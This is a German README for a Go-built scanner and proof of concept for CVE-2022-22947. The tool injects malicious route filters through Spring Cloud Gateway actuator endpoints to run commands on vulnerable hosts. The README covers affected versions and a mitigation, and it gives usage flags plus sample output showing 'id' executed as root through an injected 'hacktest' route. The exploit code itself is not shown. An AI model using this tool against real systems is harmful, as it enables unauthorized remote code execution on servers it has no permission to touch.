
Scanner und PoC für CVE-2022-22947, der Spring Cloud Gateway Actuator-Endpunkte testet, bösartige Routenfilter injiziert und Befehle gegen verwundbare Hosts ausführt.
Spring Cloud Gateway ist ein neues Projekt von Spring Cloud, das darauf abzielt, Netflix Zuul zu ersetzen. Es basiert auf Technologien wie Spring 5.0+, Spring Boot 2.0+, WebFlux (basierend auf dem hochleistungsfähigen Reactor-Pattern-Netty-Framework mit asynchronem, nicht-blockierendem Modell) und bietet eine höhere Leistung als Zuul. Offizielle Tests zeigen, dass Gateway 1,6-mal schneller ist als Zuul und eine einfache, effektive, einheitliche API-Routing-Verwaltung für Microservice-Architekturen bereitstellt. Die Remote Code Execution-Schwachstelle in Spring Cloud Gateway (CVE-2022-22947) tritt im Actuator-Endpunkt der Spring Cloud Gateway-Anwendung auf, der bei Aktivierung, Offenlegung und unsicherer Konfiguration anfällig für Code-Injection ist. Ein Angreifer kann diese Schwachstelle ausnutzen, um bösartige Anfragen zu erstellen, die die Ausführung beliebigen entfernten Codes auf dem Zielhost ermöglichen. CVSS-Score dieser Schwachstelle: 9.8, Schweregrad: Kritisch
CVE-2022-22947
3.1.0 3.0.0 bis 3.0.6 Versionen vor 3.0.0
management.endpoint.gateway.enable:false deaktiviert werdenDieses Skript wurde in Go geschrieben und als ausführbare Windows-Datei kompiliert.
-cmd string Auszuführender Befehl (Standard: "id") -host string Zu prüfende Adresse oder Pfad zur Datei mit Hosts (Standard: "http://127.0.0.1:80")

Beispiel:
./cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
>cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
result: http://127.0.0.1:10089 : {"predicate":"RouteDefinitionRouteLocator$$Lambda$978/705851885","route_id":"hacktest","filters":["[[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)\n'], order = 1]"],"uri": "http://example.com:80","order":0}
vulnerable host:
http://127.0.0.1:10089